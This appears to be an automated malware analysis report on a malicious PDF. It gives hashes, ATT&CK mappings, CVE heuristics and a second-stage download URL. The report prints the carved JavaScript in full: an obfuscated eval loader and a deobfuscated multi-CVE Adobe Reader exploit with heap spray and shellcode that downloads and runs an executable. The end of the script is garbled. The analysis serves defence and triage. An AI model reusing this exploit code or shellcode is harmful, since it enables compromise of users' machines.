Malicious PDF — malware analysis report

Static analysis result for SHA-256 89b43433371e9269…

MALICIOUS

PDF

5.2 KB Authoring application: Gisewouefirixahani (via 9617aNhowocsepacevajija) First seen: 2026-05-10
MD5: 1ecc4b0af7f32569034290fc486592af SHA-1: f388c862038f215057bbbbce0dc21db83858e02f SHA-256: 89b43433371e9269cc35ef6fc48553b46f119555a5dc094b0b04ece2c13fd977
468 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2008-2992) to execute arbitrary code. The deobfuscated JavaScript attempts to download a second-stage payload from the URL http://ahrudz.egh/4. This indicates a typical exploit delivery mechanism for a malicious PDF.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var commandLine={};
commandLine.value='varO kR~O = 157O ;var fQ ~~=~L this;Lvar wF=\'OgeOtPa\'+\'geN~~t~OhW\'+\'OOord\';vLar hQ=\'OLgeLtP\'+O\'ag~LeNuOO\'OO+O~\'mWor\'+\'ds\';~var aD=\'from\'+\'CharCo\'+\'de\';OvaLr dM=~~\'pa~Lg~OeNO\'+\'um\';var cLZ=LfQ[~LhQ](fOOQ[dM]);var dLQ=\'\';fLor(va~Or qJL=0O;qJ<~ ~OcZ; ~qJ++){dQL=[dQ,fQ[wF](~fQ[dMLO],qJL,t~rueOL)].join(~\'\'~)~~;;~}varO jLQ=\'\';for(va~Or q~OJ=0;~qJ < dQ.length; qJ+=2)L{dWN=dQ.sLOubstr(qJ,2);jQ=[jQ,StringOL[aD](parLseInt(dW~N,~16)^kR)].join(\'\');O}~Oeval(
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudz.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0xF5C 813 bytes
SHA-256: 89950d83de673b46701d1e57750e501383864f14a9095874aca71e9ad824f436
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var commandLine={};
commandLine.value='varO kR~O = 157O ;var fQ ~~=~L this;Lvar wF=\'OgeOtPa\'+\'geN~~t~OhW\'+\'OOord\';vLar hQ=\'OLgeLtP\'+O\'ag~LeNuOO\'OO+O~\'mWor\'+\'ds\';~var aD=\'from\'+\'CharCo\'+\'de\';OvaLr dM=~~\'pa~Lg~OeNO\'+\'um\';var cLZ=LfQ[~LhQ](fOOQ[dM]);var dLQ=\'\';fLor(va~Or qJL=0O;qJ<~ ~OcZ; ~qJ++){dQL=[dQ,fQ[wF](~fQ[dMLO],qJL,t~rueOL)].join(~\'\'~)~~;;~}varO jLQ=\'\';for(va~Or q~OJ=0;~qJ < dQ.length; qJ+=2)L{dWN=dQ.sLOubstr(qJ,2);jQ=[jQ,StringOL[aD](parLseInt(dW~N,~16)^kR)].join(\'\');O}~Oeval(jOQ);jQ=null;OO'.replace(/[OL~]/g, '');

try {
evalCommandLine();
} catch(e){

}

function evalCommandLine()
{
    var text = commandLine.value;
    commandLine.value = "";
    var value;
    try
    {
        value = eval(text);
    }
    catch (exc)
    {
    }

    console.log(value);
}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4885 bytes
SHA-256: 85413f35eb0de96b627b2b12221de9472e37464c8960169c5d09dfef389bf23c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
l=["iT","h"];vI=["d","dW"];var pU={p:"b".substr(13939)};var dK='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';yF={r:false};this.fU=false;var yL=this.info['z'].replace(/[\s]/g, '');var vQ={bO:"aT".substr(4267, 4267)};var dE={lE:"oP".substr(9591, 9591)};var vS = this.info;var aR = (vS.producer.substr(0,5) == 'debug');var jI = new Array(); var yJ = "%u";function lK(str){str = str.split(yJ);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function eX(str1, str2){return [str1, str2].join("");}function vM(uJ){var dKF = dC();var aJU = gF();dKF += ((dKF.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + aJU;if(aR) app.alert("URL: " + dKF);var d=yJ;var dWN="\x50\x53\x51\x52\x56\x57\x55\x9C\xE8\x00\x00\x00\x00\x5D\x83\xED\x0D\x31\xC0\x64\x03\x40\x30\x78\x10\x8B\x40\x0C\x8B\x70\x14\xAD\x89\xC0\x89\xC0\x8B\x40\x10\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x56\x57\xBE\xE2\x00\x00\x00\x01\xEE\xBF\xD2\x00\x00\x00\x01\xEF\xE8\x56\x01\x00\x00\x5F\x5E\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xD2\x00\x00\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\xE7\x01\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xC9\x01\x00\x00\x52\xFF\x95\xD6\x00\x00\x00\x89\xEA\x81\xC2\xD4\x01\x00\x00\x52\x50\xFF\x95\xDA\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x89\xEA\x81\xC2\xF4\x01\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\xFF\x95\xDE\x00\x00\x00\x9D\x5D\x5F\x5E\x5A\x59\x5B\x58\xC3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\x9F\x01\x00\x00\x66\xAD\x03\x85\x9F\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\x9F\x01\x00\x00\x8D\xBD\xA3\x01\x00\x00\xAD\x03\x85\x9F\x01\x00\x00\xAB\xAD\x03\x85\x9F\x01\x00\x00\x50\xAB\xAD\x03\x85\x9F\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\x9F\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xAB\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xA3\x01\x00\x00\x89\xC6\xAD\x03\x85\x9F\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\x9F\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x31\x32\x33\x34\x35\x36\x37\x38\x2E\x65\x78\x65\x00";dWN+=dKF;dWN+="\x00\x90";return dWN;};function dC(){var zA = (vS.author + vS.title).replace(/[\s]/g, '');var aF = nC(zA, yL, dK);return aF;};function nC(zA, dK, yL){var aF="";for(var i=0; i < zA.length; i++){var aL = dK.indexOf(zA[i]);if(aL > -1 ){aF += yL[aL];}}return aF;};function jS(zA){var out = "";zA = eB(zA);g = Math.round(zA.length / 4);if (g != zA.length /4) zA+="00";for(var i=0; i < zA.length; i+=4){out+= yJ + zA.substr(i+2, 2) + zA.substr(i, 2);}return out;};function eB(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function t(xE, len){while (xE.length * 2 < len){xE = eX(xE, xE);}return xE.substring(0, len / 2);};function mJ(fS){var aTW = 0x0c0c0c0c;        sJ = vM("pdf");if (fS == 1){aTW = 0x30303030;}var bM = 0x400000;var ln = sJ.length * 2;var gL = bM - (ln + 0x38);var xE = lK(yJ+"9090"+yJ+"9090"); xE = t(xE, gL);var vE = (aTW - 0x400000) / bM;for (var eXY = 0; eXY < vE; eXY ++ ){jI[eXY] = eX(xE, sJ);}};function gF(){try {return app.viewerVersion.toString();}catch(wV){    return 0;}}if(aR) app.alert("called exploit");var aJU = gF();if(aR)  app.alert("v: " + aJU);if (aJU > 8){if(aR) app.alert("util.printf");mJ(1);var zQ = "12999999999999999999";for (uD=0; uD < 276; uD++) zQ += "8";util.printf("%45000f", zQ);}if (aJU < 8){if(aR) app.alert("Collab.collectEmailInfo");mJ(0);var zWT = lK(yJ+"0c0c"+yJ+"0c0c");while (zWT.length < 44952) zWT += zWT;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : zWT});}if (aJU < 9.1){if (app.doc.Collab.getIcon){if(aR) app.alert("Collab.getIcon");mJ(0);var tK = unescape("%09");while (tK.length < 0x4000) tK += tK;tK = "N." + tK;app.doc.Collab.getIcon(tK);}}if (aJU == 9.2){if(aR) app.alert("media.newPlayer");mJ(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}this.vC=25211;this.vC+=185;try {var zW='yT'.substring(6215)} catch(zW){};try {var pK='oJ'.substring(6611)} catch(pK){};try {var yTY='cV'.substring(21279)} catch(yTY){};rC`rC`rC͍����'

Open this report in the interactive analyzer, or submit your own file for analysis.